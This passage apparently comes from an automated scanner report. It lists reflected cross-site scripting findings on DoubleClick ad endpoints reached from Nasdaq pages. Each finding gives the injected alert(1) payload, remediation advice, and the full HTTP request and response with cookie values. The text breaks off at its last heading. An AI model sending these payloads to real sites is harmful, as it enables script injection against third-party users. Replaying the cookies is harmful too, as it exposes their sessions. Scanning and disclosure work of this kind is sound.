<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... HMvdXJpLWNsaWNrLXRvLWV4ZWN1dGUteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLmh0bWwuaHRtbLgCGMgCmprFFqgDAdEDgo3m5suica7oA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtzXFtYkVq0bmudz_sj6EVeUl3e5UQ&client=ca-pub-4063878933780912dd6b8"-alert(1)-"95da157adb8&adurl=http%3a%2f%2fwww.devry.edu/degree-programs/colleges-overview.jsp%3Fvc%3D167474"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71b9d"-alert(1)-"d04127b78cd was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N763.N763.GoogleContentNet/B4639841.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BR3Xjuw1YTducGNL6lQeKq8WaC6KPs4cCysjo7RTAjbcB0OlfEAEYASC-zuUNOABQioiJ8QVgyYajh9SjgBCgAfLcs-sDugEJNzI4eDkwX2FzyAEJ2gFYZmlsZTovLy9DOi9jZG4vZXhhbXBsZXMvZXhwbG9pdHMvdXJpLWNsaWNrLXRvLWV4ZWN1dGUteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLmh0bWwuaHRtbLgCGMgCmprFFqgDAdEDgo3m5suica7oA7oC6APiBfUDAAAAxA&num=171b9d"-alert(1)-"d04127b78cd&sig=AGiWqtzXFtYkVq0bmudz_sj6EVeUl3e5UQ&client=ca-pub-4063878933780912&adurl=;ord=405226418? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297637934&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297616334663&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297616334682&frm=0&adk=1607234649&ga_vid=1527264931.1297616335&ga_sid=1297616335&ga_hid=1186706569&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=57&xpc=v34befYgjb&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 13 Feb 2011 17:00:14 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7051
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... cs-sDugEJNzI4eDkwX2FzyAEJ2gFYZmlsZTovLy9DOi9jZG4vZXhhbXBsZXMvZXhwbG9pdHMvdXJpLWNsaWNrLXRvLWV4ZWN1dGUteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLmh0bWwuaHRtbLgCGMgCmprFFqgDAdEDgo3m5suica7oA7oC6APiBfUDAAAAxA&num=171b9d"-alert(1)-"d04127b78cd&sig=AGiWqtzXFtYkVq0bmudz_sj6EVeUl3e5UQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.devry.edu/degree-programs/colleges-overview.jsp%3Fvc%3D167474"); var fscUrl = url; var fscUrlClickTagFound ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 286b1"-alert(1)-"5e5112ed688 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N763.N763.GoogleContentNet/B4639841.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BR3Xjuw1YTducGNL6lQeKq8WaC6KPs4cCysjo7RTAjbcB0OlfEAEYASC-zuUNOABQioiJ8QVgyYajh9SjgBCgAfLcs-sDugEJNzI4eDkwX2FzyAEJ2gFYZmlsZTovLy9DOi9jZG4vZXhhbXBsZXMvZXhwbG9pdHMvdXJpLWNsaWNrLXRvLWV4ZWN1dGUteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLmh0bWwuaHRtbLgCGMgCmprFFqgDAdEDgo3m5suica7oA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtzXFtYkVq0bmudz_sj6EVeUl3e5UQ286b1"-alert(1)-"5e5112ed688&client=ca-pub-4063878933780912&adurl=;ord=405226418? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297637934&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297616334663&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297616334682&frm=0&adk=1607234649&ga_vid=1527264931.1297616335&ga_sid=1297616335&ga_hid=1186706569&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=57&xpc=v34befYgjb&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 13 Feb 2011 17:00:57 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7051
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 9DOi9jZG4vZXhhbXBsZXMvZXhwbG9pdHMvdXJpLWNsaWNrLXRvLWV4ZWN1dGUteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLmh0bWwuaHRtbLgCGMgCmprFFqgDAdEDgo3m5suica7oA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtzXFtYkVq0bmudz_sj6EVeUl3e5UQ286b1"-alert(1)-"5e5112ed688&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.devry.edu/degree-programs/colleges-overview.jsp%3Fvc%3D167474"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44376"-alert(1)-"e277c536da2 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N763.N763.GoogleContentNet/B4639841.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l44376"-alert(1)-"e277c536da2&ai=BR3Xjuw1YTducGNL6lQeKq8WaC6KPs4cCysjo7RTAjbcB0OlfEAEYASC-zuUNOABQioiJ8QVgyYajh9SjgBCgAfLcs-sDugEJNzI4eDkwX2FzyAEJ2gFYZmlsZTovLy9DOi9jZG4vZXhhbXBsZXMvZXhwbG9pdHMvdXJpLWNsaWNrLXRvLWV4ZWN1dGUteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLmh0bWwuaHRtbLgCGMgCmprFFqgDAdEDgo3m5suica7oA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtzXFtYkVq0bmudz_sj6EVeUl3e5UQ&client=ca-pub-4063878933780912&adurl=;ord=405226418? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297637934&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297616334663&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297616334682&frm=0&adk=1607234649&ga_vid=1527264931.1297616335&ga_sid=1297616335&ga_hid=1186706569&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=57&xpc=v34befYgjb&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 13 Feb 2011 16:59:05 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7051
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/f/1ba/%2a/x%3B232375206%3B0-0%3B0%3B50145855%3B3454-728/90%3B38381417/38399174/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l44376"-alert(1)-"e277c536da2&ai=BR3Xjuw1YTducGNL6lQeKq8WaC6KPs4cCysjo7RTAjbcB0OlfEAEYASC-zuUNOABQioiJ8QVgyYajh9SjgBCgAfLcs-sDugEJNzI4eDkwX2FzyAEJ2gFYZmlsZTovLy9DOi9jZG4vZXhhbXBsZXMvZXhwbG9pdHMvdXJpLWNsaWNrLXRvLWV4ZWN1dGUteHNzLWNy ...[SNIP]...
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a89a'-alert(1)-'99c363fa133 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/exttrad.nasdaq.com/ahi_pmi;tile=6a89a'-alert(1)-'99c363fa133 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/reference/guru.stm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 473 Cache-Control: no-cache Pragma: no-cache Date: Sun, 13 Feb 2011 02:10:49 GMT Expires: Sun, 13 Feb 2011 02:10:49 GMT
2.26. http://ad.doubleclick.net/adj/footer.nasdaq.com/fidelity [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/footer.nasdaq.com/fidelity
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6513a'-alert(1)-'c5411f1f742 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/footer.nasdaq.com/fidelity;tile=11;;abr=!webtv;key=value;sz=120x60;ord=%7B793802500935271400%7D?&6513a'-alert(1)-'c5411f1f742=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/aspx/market-headlines.aspx Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 13 Feb 2011 01:44:27 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 447
2.27. http://ad.doubleclick.net/adj/home.nasdaq.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/home.nasdaq.com/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 749ff'-alert(1)-'0b97bdabd9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/home.nasdaq.com/;tile=6;;abr=!webtv;key=value;sz=120x60;ord=%7B563948719995096300%7D?&749ff'-alert(1)-'0b97bdabd9a=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.nasdaq.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 13 Feb 2011 01:54:57 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 454
2.28. http://ad.doubleclick.net/adj/home.nasdaq.com/ROSToolbar [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/home.nasdaq.com/ROSToolbar
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd6e8'-alert(1)-'d05e78d7e75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/home.nasdaq.com/ROSToolbar;tile=2;;abr=!webtv;key=value;sz=185x35;ord=%7B121342767495661970%7D?&dd6e8'-alert(1)-'d05e78d7e75=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/aspx/market-headlines.aspx Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 13 Feb 2011 01:44:22 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 447
2.29. http://ad.doubleclick.net/adj/home.nasdaq.com/home3 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/home.nasdaq.com/home3
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37b29'-alert(1)-'506a24f435b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/home.nasdaq.com/home3;tile=6;;abr=!webtv;key=value;sz=120x60;ord=%7B353306817589327700%7D?&37b29'-alert(1)-'506a24f435b=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.nasdaq.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 13 Feb 2011 01:55:09 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 459
2.30. http://ad.doubleclick.net/adj/invprod.nasdaq.com/heatmap [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/invprod.nasdaq.com/heatmap
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7dca1'-alert(1)-'fbfe5276934 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/invprod.nasdaq.com/heatmap;tile=4;;abr=!webtv;key=value;sz=120x60;ord=%7B785258022835478100%7D?&7dca1'-alert(1)-'fbfe5276934=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://quotes.nasdaq.com/screening/heatmaps.stm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 13 Feb 2011 02:12:25 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 486
2.31. http://ad.doubleclick.net/adj/quotes.nasdaq.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/quotes.nasdaq.com/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc1e0'-alert(1)-'423ee8b9ac6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/quotes.nasdaq.com/;tile=12;;abr=!webtv;key=value;sz=88x31;ord=%7B970103129278868500%7D?&dc1e0'-alert(1)-'423ee8b9ac6=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/aspx/market-headlines.aspx Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 13 Feb 2011 01:44:18 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 430
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65a03'%3balert(1)//3ff7d710d19 was submitted in the tile parameter. This input was echoed as 65a03';alert(1)//3ff7d710d19 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/quotes.nasdaq.com/;tile=65a03'%3balert(1)//3ff7d710d19 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/aspx/market-headlines.aspx Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 555 Cache-Control: no-cache Pragma: no-cache Date: Sun, 13 Feb 2011 01:44:11 GMT Expires: Sun, 13 Feb 2011 01:44:11 GMT
2.33. http://ad.doubleclick.net/adj/quotes.nasdaq.com/_default [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/quotes.nasdaq.com/_default
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb82a'-alert(1)-'25fbef87c9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/quotes.nasdaq.com/_default;tile=1;;abr=!webtv;key=value;sz=88x31;ord=%7B740396577399224000%7D?&eb82a'-alert(1)-'25fbef87c9e=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/asp/NasdaqSymLookup2.asp?mode=stock Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 13 Feb 2011 02:06:51 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 429
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c86f'-alert(1)-'3f3882b7aa2 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/quotes.nasdaq.com/icu_oh;tile=6c86f'-alert(1)-'3f3882b7aa2 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/asp/summaryquote.asp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 545 Cache-Control: no-cache Pragma: no-cache Date: Sun, 13 Feb 2011 02:08:05 GMT Expires: Sun, 13 Feb 2011 02:08:05 GMT
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f37f6"><script>alert(1)</script>43f9462365 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
